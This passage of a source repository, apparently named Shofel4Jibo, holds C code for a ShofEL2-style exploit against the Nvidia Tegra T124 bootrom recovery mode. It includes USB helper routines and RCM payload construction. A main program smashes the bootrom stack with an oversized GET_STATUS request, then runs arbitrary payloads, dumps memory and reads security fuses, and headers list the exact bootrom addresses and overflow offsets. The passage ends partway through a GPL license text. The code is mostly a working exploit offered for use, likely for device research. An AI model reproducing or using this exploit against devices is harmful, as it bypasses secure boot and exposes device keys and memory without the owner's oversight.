!usb_get_att( &d_bus, entry->d_name, "busnum", 10 ) &&
!usb_get_att( &d_num, entry->d_name, "devnum", 10 ) ) {
sprintf( path, "/dev/bus/usb/%03d/%03d", d_bus, d_num );
ret = 0;
break;
}
}
closedir( devices );
return ret;
}
int usb_open_by_vid_pid( uint16_t vid, uint16_t pid, uint8_t wait ) {
int ret;
char path[256];
do {
ret = usb_find_path_by_vid_pid( path, vid, pid );
usleep( 500 );
} while ( wait && ( ret < 0 ) );
DEBUG_MSG( "USB Path: %s\n", path );
if (ret) {
return -1;
}
return open( path, O_RDWR );
}
int usb_close( int usb ) {
return usb;
}
int usb_send_control_txn( int usb, uint8_t bRequestType, uint8_t bRequest, uint16_t wValue, uint16_t wIndex, uint16_t len, uint8_t *data, int32_t timeout ) {
int ret = -1;
size_t setup_len = sizeof ( struct setup_data ) + len;
struct setup_data *setup_data_buf;
setup_data_buf = malloc( setup_len );
memset( setup_data_buf, 0, setup_len );
setup_data_buf->bRequestType = bRequestType;
setup_data_buf->bRequest = bRequest;
setup_data_buf->wValue = wValue;
setup_data_buf->wIndex = wIndex;
setup_data_buf->wLength = len;
struct usbdevfs_urb usb_control_urb;
memset(&usb_control_urb, 0, sizeof (usb_control_urb));
usb_control_urb.type = USBDEVFS_URB_TYPE_CONTROL;
usb_control_urb.endpoint = 0x0;
usb_control_urb.buffer = setup_data_buf;
usb_control_urb.buffer_length = setup_len;
ioctl( usb, USBDEVFS_SUBMITURB, &usb_control_urb );
struct usbdevfs_urb *urb_reaped = NULL;
if ( timeout ) {
while ( timeout > 0 ) {
int _ret = ioctl( usb, USBDEVFS_REAPURBNDELAY, &urb_reaped );
if ( _ret == 0 ) {
break;
}
usleep(200000);
timeout -= 200;
}
} else {
ioctl( usb, USBDEVFS_REAPURB, &urb_reaped );
}
if ( urb_reaped && urb_reaped->status == 0 ) {
ret = 0;
memcpy( data, setup_data_buf->data, len );
}
if ( setup_data_buf ) free( setup_data_buf );
return ret;
}
int usb_send_bulk_txn( int usb, uint32_t ep, uint32_t len, void *data ) {
struct usbdevfs_bulktransfer bulk_txn;
memset( &bulk_txn, 0, sizeof ( bulk_txn ) );
bulk_txn.ep = ep;
bulk_txn.len = len;
bulk_txn.timeout = USB_BULK_TIMEOUT;
bulk_txn.data = data;
if ( ioctl( usb, USBDEVFS_BULK, &bulk_txn ) == len )
return 0;
return -1;
}

145
Shofel4Jibo/exploit/rcm.c Normal file
View File

@@ -0,0 +1,145 @@
#include "rcm.h"
int get_payload_aft_len( int payload_file_fd ) {
struct stat payload_file_stat;
fstat( payload_file_fd, &payload_file_stat );
size_t payload_size = payload_file_stat.st_size;
if ( payload_size > MAX_PAYLOAD_FILE_SIZE ) {
fprintf( stderr, "Error: Payload file exceeds max payload size: %d bytes.\n", MAX_PAYLOAD_FILE_SIZE );
return -1;
}
size_t payload_aft_len = 0;
if ( payload_size > MAX_PAYLOAD_BEF_SIZE ) {
payload_aft_len = payload_size - MAX_PAYLOAD_BEF_SIZE;
}
return payload_aft_len;
}
int read_intermezzo( uint8_t *rcm_cmd_buf ) {
int ret = -1;
int intermezzo_fd = 0;
intermezzo_fd = open( "intermezzo.bin", O_RDONLY );
if ( intermezzo_fd < 0 ) {
fprintf( stderr, "Error: Couldn't open the intermezzo.bin file.\n" );
goto exit;
}
struct stat intermezzo_stat;
fstat( intermezzo_fd, &intermezzo_stat );
size_t intermezzo_size = intermezzo_stat.st_size;
if ( intermezzo_size > INTERMEZZO_LEN ) {
fprintf( stderr, "Error: Intermezzo file exceeds max intermezzo size: %d bytes.\n", INTERMEZZO_LEN );
goto exit;
}
read( intermezzo_fd, rcm_cmd_buf + RCM_CMD_BUF_INTERMEZZO_START, INTERMEZZO_LEN );
ret = 0;
exit:
if ( intermezzo_fd > 0) close( intermezzo_fd );
return ret;
}
int read_payload_file( int payload_file_fd, uint8_t *rcm_cmd_buf, size_t rcm_cmd_buf_len ) {
uint32_t payload_bef_len = read( payload_file_fd, rcm_cmd_buf + RCM_CMD_BUF_PAYLOAD_START, MAX_PAYLOAD_BEF_SIZE );
uint32_t payload_aft_len = 0;
if ( rcm_cmd_buf_len > RCM_CMD_BUF_PAYLOAD_CONT ) {
payload_aft_len = read( payload_file_fd, rcm_cmd_buf + RCM_CMD_BUF_PAYLOAD_CONT, rcm_cmd_buf_len - RCM_CMD_BUF_PAYLOAD_CONT );
}
payload_bef_len = TO_LITTLE_ENDIAN( payload_bef_len );
payload_aft_len = TO_LITTLE_ENDIAN( payload_aft_len );
memcpy( rcm_cmd_buf + RCM_CMD_BUF_PAYLOAD_BEF_LENVAR, (uint8_t *)&payload_bef_len, 0x4 );
memcpy( rcm_cmd_buf + RCM_CMD_BUF_PAYLOAD_AFT_LENVAR, (uint8_t *)&payload_aft_len, 0x4 );
return 0;
}
int build_rcm_cmd( int payload_file_fd, uint8_t *rcm_cmd_buf, size_t rcm_cmd_buf_len, uint32_t payload_thumb_mode ) {
int ret = -1;
const uint32_t rcm_cmd_len = TO_LITTLE_ENDIAN( RCM_CMD_LEN );
const uint32_t payload_entry = TO_LITTLE_ENDIAN( BOOTROM_PAYLOAD_ENTRY | 0x1 );
payload_thumb_mode = TO_LITTLE_ENDIAN( payload_thumb_mode );
ret = read_intermezzo( rcm_cmd_buf );
if ( ret < 0 ) {
goto exit;
}
ret = read_payload_file( payload_file_fd, rcm_cmd_buf, rcm_cmd_buf_len );
if ( ret < 0 ) {
goto exit;
}
memcpy( rcm_cmd_buf, (uint8_t *)&rcm_cmd_len, sizeof(uint32_t) );
memcpy( rcm_cmd_buf + RCM_CMD_BUF_MEMCPY_RET_ADD, (uint8_t *)&payload_entry, sizeof(uint32_t) );
memcpy( rcm_cmd_buf + RCM_CMD_BUF_PAYLOAD_THUMB_MODE, (uint8_t *)&payload_thumb_mode, sizeof(uint32_t) );
ret = 0;
exit:
return ret;
}
int send_rcm_cmd( int rcm_usb, char* payload_filename, uint32_t payload_thumb_mode ) {
int ret = -1;
uint8_t *rcm_cmd_buf = 0;
int payload_file_fd = 0;
payload_file_fd = open( payload_filename, O_RDONLY );
if ( payload_file_fd < 0 ) {
fprintf( stderr, "Error: Couldn't open the payload file: %s.\n", payload_filename );
goto exit;
}
int payload_aft_len = get_payload_aft_len( payload_file_fd );
if ( payload_aft_len < 0 ) {
goto exit;
}
size_t rcm_cmd_buf_len = RCM_CMD_BUF_PAYLOAD_CONT + payload_aft_len;
size_t padding = 0x1000 - ( rcm_cmd_buf_len % 0x1000 );
uint32_t n_writes = ( rcm_cmd_buf_len + padding) / 0x1000;
if ( ! ( n_writes % 2 ) ) {
padding += 0x1000;
}
rcm_cmd_buf = malloc( rcm_cmd_buf_len + padding );
if ( !rcm_cmd_buf ) {
fprintf( stderr, "Error: Couldn't alloc memory for RCM CMD buffer\n" );
goto exit;
}
memset( rcm_cmd_buf, 0x00, rcm_cmd_buf_len + padding);
ret = build_rcm_cmd( payload_file_fd, rcm_cmd_buf, rcm_cmd_buf_len, payload_thumb_mode );
if ( ret < 0 ) {
goto exit;
}
ret = usb_send_bulk_txn( rcm_usb, RCM_EP1_OUT, rcm_cmd_buf_len + padding, rcm_cmd_buf );
exit:
if (payload_file_fd > 0) close(payload_file_fd);
if (rcm_cmd_buf) free(rcm_cmd_buf);
return ret;
}

230
Shofel4Jibo/exploit/shofel2_t124.c Normal file
View File

@@ -0,0 +1,230 @@
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include "t124.h"
#include "rcm.h"
#include "fuse.h"
#include "mini_libusb.h"
#include "mem_dumper_usb_server.h"
void print_hex_memory( void *mem, size_t size ) {
uint8_t *p = (uint8_t *)mem;
for ( int i = 0; i < size ; i++ ) {
if ( ( ( i % 16 ) == 0 ) && i )
printf( "\n" );
printf( "0x%02x ", p[i] );
}
printf( "\n" );
}
void print_help() {
fprintf( stderr, "shofel2_t124 ( MEM_DUMP | READ_FUSES | BOOT_BCT | PAYLOAD | DUMP_STACK ) [options]\n"
"\t* MEM_DUMP address length out_file -> Dumps \"length\" bytes starting from \"address\" to \"out_file\".\n"
"\t* READ_FUSES out_file -> Dumps the T124 fuses to \"out_file\" and show them in console.\n"
"\t* BOOT_BCT -> Boots BCT without applying locks.\n"
"\t* PAYLOAD payload.bin [arm|thumb] -> Boots \"payload.bin\" the entrymode mode can be specified (thumb by default).\n"
"\t* DUMP_STACK -> Dumps the stack as it is before smash it.\n\n" );
}
int main( int argc, char *argv[] ) {
int _ret_main = -1;
int rcm_usb = 0;
uint8_t *data = NULL;
int hacky_get_status_len = BOOTROM_SMASH_LEN;
char *payload_filename = NULL;
uint32_t payload_thumb_mode = 1;
uint8_t *dump = NULL;
uint32_t dump_start = 0;
uint32_t dump_len = 0;
char *dump_filename;
int dump_fd = -1;
uint8_t do_print_fuse = 0;
// ---- PARSE ARGS ----
if ( argc < 2 ) {
fprintf( stderr, "Error: invalid argument count.\n\n" );
print_help();
goto exit;
}
if ( !strcmp( argv[1], "MEM_DUMP" ) ) {
if ( argc != 5 ) {
fprintf( stderr, "Error: invalid argument count. shofel2_t124 MEM_DUMP address length out_file.\n" );
goto exit;
}
payload_filename = "mem_dumper_usb_server.bin";
sscanf( argv[2], "%x", &dump_start );
sscanf( argv[3], "%x", &dump_len );
dump_filename = argv[4];
} else if ( !strcmp( argv[1], "READ_FUSES" ) ) {
if ( argc != 3 ) {
fprintf( stderr, "Error: invalid argument count. shofel2_t124 READ_FUSES out_file.\n" );
goto exit;
}
payload_filename = "mem_dumper_usb_server.bin";
dump_start = FUSE_BASE;
dump_len = FUSE_LEN;
dump_filename = argv[2];
do_print_fuse = 1;
} else if ( !strcmp( argv[1], "BOOT_BCT" ) ) {
if ( argc != 2 ) {
fprintf( stderr, "Error: invalid argument count. shofel2_t124 BOOT_BCT.\n" );
goto exit;
}
payload_filename = "boot_bct.bin";
} else if ( !strcmp( argv[1], "PAYLOAD" ) ) {
if ( ( argc != 3 ) && ( argc != 4 ) ) {
fprintf( stderr, "Error: invalid argument count. shofel2_t124 PAYLOAD payload.bin [arm|thumb]\nThumb mode will be used by default.\n" );
goto exit;
}
payload_filename = argv[2];
if ( ( argc == 4 ) && ( argv[3][0] == 'a' ) ) {
payload_thumb_mode = 0;
}
} else if ( !strcmp( argv[1], "DUMP_STACK" ) ) {
if ( argc != 2 ) {
fprintf( stderr, "Error: invalid argument count. shofel2_t124 DUMP_STACK.\n" );
goto exit;
}
payload_filename = "boot_bct.bin"; // This payload shouldn't run on this CMD...
hacky_get_status_len = BOOTROM_STACK_GAP_LEN;
} else {
fprintf( stderr, "Error: invalid command.\n\n" );
print_help();
goto exit;
}
// --------------------
// ----- INIT RCM -----
printf( "Waiting T124 to enter RCM mode (ctrl-c to cancel). Note: root permission could be required.\n" );
rcm_usb = usb_open_by_vid_pid( (uint16_t)JETSON_TK1_VID, (uint16_t)JETSON_TK1_PID, 1 );
printf( "K1 in RCM mode connected.\n" );
if ( rcm_usb < 0 ) {
fprintf( stderr, "Error: Couldn't open the usb.\n" );
goto exit;
}
uint8_t chip_id_buf[RCM_CHIP_ID_LEN];
memset( &chip_id_buf, 0, sizeof(chip_id_buf) );
int ret = usb_send_bulk_txn( rcm_usb, RCM_EP1_IN, RCM_CHIP_ID_LEN, chip_id_buf );
if ( ret < 0 ) {
fprintf( stderr, "Error: Couldn't read Chip ID. Please reset T124 in RCM mode again.\n" );
goto exit;
}
printf( "Chip ID: " );
print_hex_memory( chip_id_buf, RCM_CHIP_ID_LEN );
//-----------------------
// ---- SEND PAYLOAD ----
ret = send_rcm_cmd(rcm_usb, payload_filename, payload_thumb_mode);
if ( ret < 0 ) {
printf( "Error: Couldn't send RCM CMD.\n" );
goto exit;
}
//----------------------
// ---- RUN EXPLOIT ----
data = malloc( hacky_get_status_len );
ret = usb_send_control_txn( rcm_usb, USB_CTRL_DEVICE_ENDPOINT_TO_HOST,
USB_CTRL_GET_STATUS, 0, 0, hacky_get_status_len, data, 500 );
if ( ret == 0 ) {
if ( hacky_get_status_len == BOOTROM_STACK_GAP_LEN ) {
printf( "Hacky Get Status finished correctly... Showing Stack\n" );
_ret_main = 0;
} else {
printf( "Error: Hacky Get Status finished correctly... Not cool :-(\n" );
}
print_hex_memory( data, hacky_get_status_len );
goto exit;
}
printf( "Hacky Get Status returned error... Probably the stack got smashed, Congrats :-)\n" );
//----------------------
// --- MEM DUMP CMD ----
if ( dump_len ) {
printf( "Dumping %d bytes from 0x%08x.\n", dump_len, dump_start );
struct mem_dumper_args_s mem_dumper_args = {
.start = dump_start,
.len = dump_len
};
ret = usb_send_bulk_txn( rcm_usb, RCM_EP1_OUT, sizeof( mem_dumper_args ), &mem_dumper_args );
if ( ret < 0 ) {
printf( "Error: Fail sending arguments to memory dumper usb server.\n" );
goto exit;
}
dump = malloc( dump_len );
ret = usb_send_bulk_txn( rcm_usb, RCM_EP1_IN, dump_len, dump );
if ( ret < 0 ) {
printf( "Error: Fail receiving memory dump.\n" );
goto exit;
}
dump_fd = open( dump_filename, O_WRONLY | O_TRUNC | O_CREAT );
if ( dump_fd < 0 ) {
printf( "Error: Fail opening dump out file.\n" );
goto exit;
}
write( dump_fd, dump, dump_len );
if ( do_print_fuse ) {
print_fuses( (fuse_chip_registers_t *) dump );
}
}
//----------------------
_ret_main = 0;
exit:
if ( rcm_usb > 0 ) usb_close( rcm_usb );
if ( dump ) free( dump );
if ( dump_fd > 0 ) close( dump_fd );
if ( data ) free( data );
return _ret_main;
}

17
Shofel4Jibo/include/endianness.h Normal file
View File

@@ -0,0 +1,17 @@
#ifndef _ENDIANNESS_H_
#define _ENDIANNESS_H_
#ifdef __BYTE_ORDER
#if __BYTE_ORDER == __BIG_ENDIAN
#include <byteswap.h>
#define TO_LITTLE_ENDIAN(x) bswap_32(x)
#elif __BYTE_ORDER == __LITTLE_ENDIAN
#define TO_LITTLE_ENDIAN(x) x
#endif
#endif
#endif

127
Shofel4Jibo/include/fuse.h Normal file
View File

@@ -0,0 +1,127 @@
#ifndef _FUSE_H_
#define _FUSE_H_
#include <stdio.h>
#include <stdint.h>
// Based on https://github.com/moriczgergo/moonflower/blob/933ab9ef66b76aa49ad2c29ca88d78173a81eff2/src/fuse.h
typedef struct {
uint32_t FUSE_PRODUCTION_MODE; //0x000
uint32_t FUSE_JTAG_SECUREID_VALID; //0x004
uint32_t FUSE_ODM_LOCK; //0x008
uint32_t FUSE_OPT_OPENGL_EN; //0x00c
uint32_t FUSE_SKU_INFO; //0x010
uint32_t FUSE_CPU_SPEEDO_0_CALIB; //0x014
uint32_t FUSE_CPU_IDDQ_CALIB; //0x018
uint32_t RESERVED_0x01C;
uint32_t RESERVED_0x020;
uint32_t RESERVED_0x024;
uint32_t FUSE_OPT_FT_REV; //0x028
uint32_t FUSE_CPU_SPEEDO_1_CALIB; //0x02c
uint32_t FUSE_CPU_SPEEDO_2_CALIB; //0x030
uint32_t FUSE_SOC_SPEEDO_0_CALIB; //0x034
uint32_t FUSE_SOC_SPEEDO_1_CALIB; //0x038
uint32_t FUSE_SOC_SPEEDO_2_CALIB; //0x03c
uint32_t FUSE_SOC_IDDQ_CALIB; //0x040
uint32_t RESERVED_0x044;
uint32_t FUSE_FA; //0x048
uint32_t FUSE_RESERVED_PRODUCTION; //0x04c
uint32_t FUSE_HDMI_LANE0_CALIB; //0x050
uint32_t FUSE_HDMI_LANE1_CALIB; //0x054
uint32_t FUSE_HDMI_LANE2_CALIB; //0x058
uint32_t FUSE_HDMI_LANE3_CALIB; //0x05c
uint32_t FUSE_ENCRYPTION_RATE; //0x060
uint32_t FUSE_PUBLIC_KEY[0x8]; //0x064 - 0x080
uint32_t FUSE_TSENSOR1_CALIB; //0x084
uint32_t FUSE_TSENSOR2_CALIB; //0x088
uint32_t RESERVED_0x08C;
uint32_t FUSE_OPT_CP_REV; //0x090
uint32_t FUSE_OPT_PFG; //0x094
uint32_t FUSE_TSENSOR0_CALIB; //0x098
uint32_t FUSE_BOOTROM_PATCH_SIZE; //0x09c
uint32_t FUSE_SECURITY_MODE; //0x0a0
uint32_t FUSE_PRIVATE_KEY[0x4]; //0x0a4 - 0x0b0
uint32_t FUSE_DEVICE_KEY; //0x0b4
uint32_t FUSE_ARM_DEBUG_DIS; //0x0b8
uint32_t FUSE_BOOT_DEVICE_INFO; //0x0bc
uint32_t FUSE_RESERVED_SW; //0x0c0
uint32_t FUSE_VP8_ENABLE; //0x0c4
uint32_t FUSE_RESERVED_ODM[0x8]; //0x0c8-0x0e4
uint32_t FUSE_OBS_DIS; //0x0e8
uint32_t RESERVED_0x0EC;
uint32_t FUSE_USB_CALIB; //0x0f0
uint32_t FUSE_SKU_DIRECT_CONFIG; //0x0f4
uint32_t FUSE_KFUSE_PRIVKEY_CTRL; //0x0f8
uint32_t FUSE_PACKAGE_INFO; //0x0fc
uint32_t FUSE_OPT_VENDOR_CODE; //0x100
uint32_t FUSE_OPT_FAB_CODE; //0x104
uint32_t FUSE_OPT_LOT_CODE_0; //0x108
uint32_t FUSE_OPT_LOT_CODE_1; //0x10c
uint32_t FUSE_OPT_WAFER_ID; //0x110
uint32_t FUSE_OPT_X_COORDINATE; //0x114
uint32_t FUSE_OPT_Y_COORDINATE; //0x118
uint32_t FUSE_OPT_SEC_DEBUG_EN; //0x11c
uint32_t FUSE_OPT_OPS_RESERVED; //0x120
uint32_t FUSE_SATA_CALIB; //0x124
uint32_t FUSE_GPU_IDDQ_CALIB; //0x128
uint32_t FUSE_TSENSOR3_CALIB; //0x12c
uint32_t FUSE_SKU_BOND_OUT_L; //0x130
uint32_t FUSE_SKU_BOND_OUT_H; //0x134
uint32_t FUSE_SKU_BOND_OUT_U; //0x138
uint32_t FUSE_SKU_BOND_OUT_V; //0x13c
uint32_t FUSE_SKU_BOND_OUT_W; //0x140
uint32_t RESERVED_0x144;
uint32_t FUSE_OPT_SUBREVISION; //0x148
uint32_t FUSE_OPT_SW_RESERVED_0; //0x14c
uint32_t FUSE_OPT_SW_RESERVED_1; //0x150
uint32_t FUSE_TSENSOR4_CALIB; //0x154
uint32_t FUSE_TSENSOR5_CALIB; //0x158
uint32_t FUSE_TSENSOR6_CALIB; //0x15c
uint32_t FUSE_TSENSOR7_CALIB; //0x160
uint32_t FUSE_OPT_PRIV_SEC_EN; //0x164
uint32_t FUSE_PKC_DISABLE; //0x168
uint32_t RESERVED_0x16C;
uint32_t RESERVED_0x170;
uint32_t RESERVED_0x174;
uint32_t RESERVED_0x178;
uint32_t FUSE_FUSE2TSEC_DEBUG_DISABLE; //0x17c
uint32_t FUSE_TSENSOR8_CALIB; //0x180 // <--WTF
uint32_t FUSE_OPT_CP_BIN; //0x184
uint32_t FUSE_OPT_GPU_FS; //0x188
uint32_t FUSE_OPT_FT_BIN; //0x18c
uint32_t RESERVED_0x190;
uint32_t FUSE_SKU_BOND_OUT_X; //0x194
uint32_t FUSE_APB2JTAG_DISABLE; //0x198
uint32_t RESERVED_0x19C;
uint32_t FUSE_PHY_FLOORSWEEP; //0x1a0
uint32_t FUSE_PHY_FLOOR_ENABLE; //0x1a4
uint32_t FUSE_ARM_CRYPT_DE_FEATURE; //0x1a8
uint32_t FUSE_DENVER_MTS_DE_FEATURE; //0x1ac
uint32_t FUSE_DIE_VERSION_OVERRIDE; //0x1b0
uint32_t FUSE_TRIMMERS; //0x1b4
uint32_t FUSE_DENVER_BOOT_SEC; //0x1b8
uint32_t FUSE_DENVER_DFD_ACCESS; //0x1bc
uint32_t FUSE_WOA_SKU_FLAG; //0x1c0
uint32_t FUSE_ECO_RESERVE_1; //0x1c4
uint32_t FUSE_GCPLEX_CONFIG_FUSE; //0x1c8
uint32_t RESERVED_0x1CC;
uint32_t RESERVED_0x1D0;
uint32_t RESERVED_0x1D4;
uint32_t RESERVED_0x1D8;
uint32_t RESERVED_0x1DC;
uint32_t RESERVED_0x1E0;
uint32_t RESERVED_0x1E4;
uint32_t RESERVED_0x1E8;
uint32_t RESERVED_0x1EC;
uint32_t RESERVED_0x1F0;
uint32_t RESERVED_0x1F4;
uint32_t RESERVED_0x1F8;
uint32_t FUSE_SPARE_REALIGNMENT_REG; //0x1fc
uint32_t FUSE_SPARE_BITS[0X40]; //0x200 - 0X2fc
} fuse_chip_registers_t;
void print_fuses( fuse_chip_registers_t *fuse_chip_registers );
#endif

16
Shofel4Jibo/include/mem_dumper_usb_server.h Normal file
View File

@@ -0,0 +1,16 @@
#ifndef _MEM_DUMP_USB_SERVER_H_
#define _MEM_DUMP_USB_SERVER_H_
#if __arm__
typedef u32 uint32_t;
#else
#include <stdint.h>
#endif
struct mem_dumper_args_s {
uint32_t start;
uint32_t len;
};
#endif

37
Shofel4Jibo/include/mini_libusb.h Normal file
View File

@@ -0,0 +1,37 @@
#ifndef _MINI_LIBUSB_H_
#define _MINI_LIBUSB_H_
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <dirent.h>
#include <errno.h>
#include <ctype.h>
#include <sys/ioctl.h>
#include <linux/usbdevice_fs.h>
#define USB_CTRL_DEVICE_ENDPOINT_TO_HOST 0x82
#define USB_CTRL_GET_STATUS 0x00
#define USB_BULK_TIMEOUT 500
#if DEBUG
#define DEBUG_MSG(fmt, ...) do { fprintf( stderr, "%s:%d:%s(): " fmt, \
__FILE__, __LINE__, __func__, ##__VA_ARGS__ ); } while(0)
#else
#define DEBUG_MSG(fmt, ...)
#endif
int usb_open_by_vid_pid( uint16_t vid, uint16_t pid, uint8_t wait );
int usb_close( int usb );
int usb_send_bulk_txn( int usb, uint32_t ep, uint32_t len, void *data );
int usb_send_control_txn( int usb, uint8_t bRequestType, uint8_t bRequest, uint16_t wValue, uint16_t wIndex, uint16_t len, uint8_t *data, int32_t timeout );
#endif

17
Shofel4Jibo/include/rcm.h Normal file
View File

@@ -0,0 +1,17 @@
#ifndef _RCM_H_
#define _RCM_H_
#include <sys/stat.h>
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include "t124.h"
#include "mini_libusb.h"
#include "endianness.h"
int send_rcm_cmd( int rcm_usb, char* payload_filename, uint32_t payload_thumb_mode );
#endif

115
Shofel4Jibo/include/t124.h Normal file
View File

@@ -0,0 +1,115 @@
#ifndef _T124_RCM_H_
#define _T124_RCM_H_
#define JETSON_TK1_VID 0x0955
#define JETSON_TK1_PID 0x7740
#define SHIELD_TK1_VID 0x0955
#define SHIELD_TK1_PID 0x7740
#define IROM_BEGIN 0x00100000
#define IROM_END 0x0010FFFF
#define IROM_LEN 0x00010000
#define IRAM_BEGIN 0x40000000
#define IRAM_END 0x4003FFFF
#define IRAM_LEN 0x00040000
#define BOOTROM_DO_BCT_BOOT 0x00100624
#define BOOTROM_EP1_IN_WRITE_IMM 0x001065C0
#define BOOTROM_EP1_OUT_READ_IMM 0x00106612
#define BOOTROM_USB_BUF_1 0x40004000
#define BOOTROM_USB_BUF_2 0x40008000
#define BOOTROM_PAYLOAD_ENTRY 0x4000E000
#define BOOTROM_SMASH_TARGET 0x4000DCD8
#define BOOTROM_STACK_GAP_LEN 0x30C
#define BOOTROM_SMASH_LEN (BOOTROM_SMASH_TARGET - BOOTROM_USB_BUF_2) // 0x5CD8
#define BOOTROM_GET_SECURITY_MODE 0x001002DA
#define VARS_LEN 0x10
#define INTERMEZZO_LEN 0x100
#define INTERMEZZO_REL_ADD \
(BOOTROM_PAYLOAD_ENTRY - INTERMEZZO_LEN) // 0x4000DF00
#define OFFSET_INTERMEZZO_START 0x0
#define OFFSET_PAYLOAD_START (INTERMEZZO_LEN)
#define OFFSET_MEMCPY_RET_ADD \
(BOOTROM_SMASH_LEN - BOOTROM_STACK_GAP_LEN - \
0x4) // 0x59C8 ( 0x30C Bytes copied from the stack before entry )
#define OFFSET_PAYLOAD_BEF_LENVAR (OFFSET_MEMCPY_RET_ADD - 0x4)
#define OFFSET_PAYLOAD_AFT_LENVAR (OFFSET_MEMCPY_RET_ADD - 0x8)
#define OFFSET_PAYLOAD_THUMB_MODE (OFFSET_MEMCPY_RET_ADD - 0xC)
#define OFFSET_PAYLOAD_CONT (OFFSET_MEMCPY_RET_ADD + 0x4)
#define IRAM_ADD_INTERMEZZO_START \
(BOOTROM_PAYLOAD_ENTRY + OFFSET_INTERMEZZO_START)
#define IRAM_ADD_PAYLOAD_START (BOOTROM_PAYLOAD_ENTRY + OFFSET_PAYLOAD_START)
#define IRAM_ADD_PAYLOAD_BEF_LENVAR \
(BOOTROM_PAYLOAD_ENTRY + OFFSET_PAYLOAD_BEF_LENVAR)
#define IRAM_ADD_PAYLOAD_AFT_LENVAR \
(BOOTROM_PAYLOAD_ENTRY + OFFSET_PAYLOAD_AFT_LENVAR)
#define IRAM_ADD_PAYLOAD_THUMB_MODE \
(BOOTROM_PAYLOAD_ENTRY + OFFSET_PAYLOAD_THUMB_MODE)
#define IRAM_ADD_PAYLOAD_CONT (BOOTROM_PAYLOAD_ENTRY + OFFSET_PAYLOAD_CONT)
#define RCM_EP1_IN 0x81
#define RCM_EP1_OUT 0x01
#define RCM_CHIP_ID_LEN 0x10
#define RCM_CMD_LEN 0x32274
#define RCM_CMD_MAX_USEFUL_LEN \
0x31000 // Ensures Header + Payload + Padding doesn't complete RCM CMD and
// buffer 2 is used for getstatus.
#define RCM_CMD_HEADER_LEN 0x284
#define RCM_CMD_BUF_INTERMEZZO_START \
(RCM_CMD_HEADER_LEN + OFFSET_INTERMEZZO_START)
#define RCM_CMD_BUF_PAYLOAD_START (RCM_CMD_HEADER_LEN + OFFSET_PAYLOAD_START)
#define RCM_CMD_BUF_MEMCPY_RET_ADD (RCM_CMD_HEADER_LEN + OFFSET_MEMCPY_RET_ADD)
#define RCM_CMD_BUF_PAYLOAD_BEF_LENVAR \
(RCM_CMD_HEADER_LEN + OFFSET_PAYLOAD_BEF_LENVAR)
#define RCM_CMD_BUF_PAYLOAD_AFT_LENVAR \
(RCM_CMD_HEADER_LEN + OFFSET_PAYLOAD_AFT_LENVAR)
#define RCM_CMD_BUF_PAYLOAD_THUMB_MODE \
(RCM_CMD_HEADER_LEN + OFFSET_PAYLOAD_THUMB_MODE)
#define RCM_CMD_BUF_PAYLOAD_CONT (RCM_CMD_HEADER_LEN + OFFSET_PAYLOAD_CONT)
#define MAX_PAYLOAD_BEF_SIZE \
(OFFSET_PAYLOAD_THUMB_MODE - OFFSET_PAYLOAD_START) // 22716 Bytes
#define MAX_PAYLOAD_AFT_SIZE \
(RCM_CMD_MAX_USEFUL_LEN - RCM_CMD_BUF_PAYLOAD_CONT) // 177072 Bytes
#define MAX_PAYLOAD_FILE_SIZE \
(MAX_PAYLOAD_BEF_SIZE + MAX_PAYLOAD_AFT_SIZE) // 199788 Bytes
#define SECURE_BOOT_BASE 0x6000C200
#define SB_CSR_0 0x0
#define SB_PIROM_START_0 0x4
#define SB_PFCFG_0 0x8
#define JTAG_ON 0x00000080
#define APB_BASE 0x70000000
#define APB_MISC_PP_CONFIG_CTL_0 0x24
#define APB_MISC_PP_CONFIG_CTL_0_JTAG 0x40
#define APB_MISC_PP_CONFIG_CTL_0_TBE 0x80
#define FLOW_CTLR_BASE 0x60007000
#define FLOW_CTLR_HALT_COP_EVENTS_0 0x4
#define FLOW_CTLR_HALT_COP_FLOW_MODE_WAITEVENT (1 << 30)
#define FLOW_CTLR_HALT_COP_JTAG (1 << 28)
#define PMC_BASE 0x7000e400
#define PMC_CNTRL 0x000
#define PMC_CNTRL_MAIN_RST (1 << 4)
#define PMC_SCRATCH0 0x050
#define PMC_SCRATCH0_MODE_RCM (1 << 1)
#define FUSE_BASE 0x7000F900
#define FUSE_LEN 0x300
/* ipatch hardware */
#define IPATCH_BASE (0x6001dc00)
#define IPATCH_SELECT (0x0)
#define IPATCH_REGS (0x4)
#endif

20
Shofel4Jibo/include/types.h Normal file
View File

@@ -0,0 +1,20 @@
#ifndef _TYPES_H_
#define _TYPES_H_
typedef signed char s8;
typedef signed short s16;
typedef signed int s32;
typedef signed long long s64;
typedef unsigned char u8;
typedef unsigned short u16;
typedef unsigned int u32;
typedef unsigned long long u64;
typedef volatile u8 vu8;
typedef volatile u16 vu16;
typedef volatile u32 vu32;
typedef volatile u64 vu64;
typedef u32 size_t;
typedef u32 uintptr_t;
typedef void (*entry_point)(void);
#endif

339
Shofel4Jibo/memloader/mm/LICENSE Normal file
View File

@@ -0,0 +1,339 @@
GNU GENERAL PUBLIC LICENSE
Version 2, June 1991
Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The licenses for most software are designed to take away your
freedom to share and change it. By contrast, the GNU General Public
License is intended to guarantee your freedom to share and change free
software--to make sure the software is free for all its users. This
General Public License applies to most of the Free Software
Foundation's software and to any other program whose authors commit to
using it. (Some other Free Software Foundation software is covered by
the GNU Lesser General Public License instead.) You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
this service if you wish), that you receive source code or can get it
if you want it, that you can change the software or use pieces of it
in new free programs; and that you know you can do these things.
To protect your rights, we need to make restrictions that forbid
anyone to deny you these rights or to ask you to surrender the rights.
These restrictions translate to certain responsibilities for you if you
distribute copies of the software, or if you modify it.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must give the recipients all the rights that
you have. You must make sure that they, too, receive or can get the
source code. And you must show them these terms so they know their
rights.
We protect your rights with two steps: (1) copyright the software, and
(2) offer you this license which gives you legal permission to copy,
distribute and/or modify the software.
Also, for each author's protection and ours, we want to make certain
